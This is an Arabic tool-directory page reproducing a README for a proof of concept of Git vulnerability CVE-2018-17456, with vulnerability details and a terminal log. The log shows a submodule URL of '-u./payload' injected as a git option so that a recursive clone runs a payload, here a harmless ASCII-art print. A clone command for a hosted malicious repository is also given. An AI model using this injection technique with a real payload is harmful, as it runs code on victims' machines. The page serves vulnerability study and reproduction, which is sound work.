Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-17456 — CVE-2018-17456 إعادة إنتاج الثغرة(PoC+Exp) | Kitploit
أدوات/GitHubGitHub/anonymking/cve-2018-17456
تحليل الثغرات الأمنيةتحليل الكودالاستغلالأمن سلسلة التوريدالتعلم والتعليماستغلال الملفات الثنائية
GitHubanonymking/cve-2018-17456

CVE-2018-17456

CVE-2018-17456 إعادة إنتاج الثغرة(PoC+Exp)

عرض المستودع
5منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-17456

مقدمة الثغرة

  • اسم الثغرة: ثغرة التحقق من الإدخال في Git
  • رقم CNNVD: CNNVD-201810-234
  • مستوى الخطورة: حرج
  • رقم CVE: CVE-2018-17456
  • نوع الثغرة: خطأ التحقق من الإدخال
  • تاريخ النشر: 2018-10-08
  • نوع التهديد: عن بُعد
  • تاريخ التحديث: 2019-04-25
  • البائع: debian
  • مصدر الثغرة: Atlassian, TerryZh...
  • ملخص الثغرة: Git هو نظام تحكم إصدار موزع مجاني ومفتوح المصدر. توجد ثغرة في التحقق من الإدخال في Git. تنشأ هذه الثغرة بسبب عدم التحقق من البيانات المدخلة بشكل صحيح من قبل النظام أو المنتج. الإصدارات المتأثرة هي: الإصدارات قبل Git 2.14.5، والإصدارات 2.15.x قبل 2.15.3، والإصدارات 2.16.x قبل 2.16.5، والإصدارات 2.17.x قبل 2.17.2، والإصدارات 2.18.x قبل 2.18.1، والإصدارات 2.19.x قبل 2.19.1.

إعادة إنتاج الثغرة

  • نظرًا لمشكلة آلية الأمان في Github، لا يمكن تحميل المشروع الضار، لذا يمكنك تشغيل البرنامج النصي build.sh لإنشاء هذا المشروع محليًا للتعلم والاختبار.
  • إصدار Git الذي استخدمته هو git-2.12.1
  • العملية والنتيجة كما يلي:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • الكود الضار الذي أنشأته في payload هو إخراج بوذا، لذا فإن رؤية بوذا تعني نجاح الاختبار؛ في الواقع، سيتم الإخراج مرتين لأن هناك محاولة إعادة واحدة عند فشل استنساخ المشروع الفرعي.

المراجع

  • المشروع poc-submodule

اكتشاف غير متوقع

  • لقد قمت ببناء هذا المشروع بنجاح على Coding - CVE-2018-17456
  • طريقة الاستخدام:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • بالإضافة إلى ذلك، يوصى بدراسة ثغرتين متشابهتين معًا: CVE-2017-1000117، CVE-2018-11235
تنزيل الأداة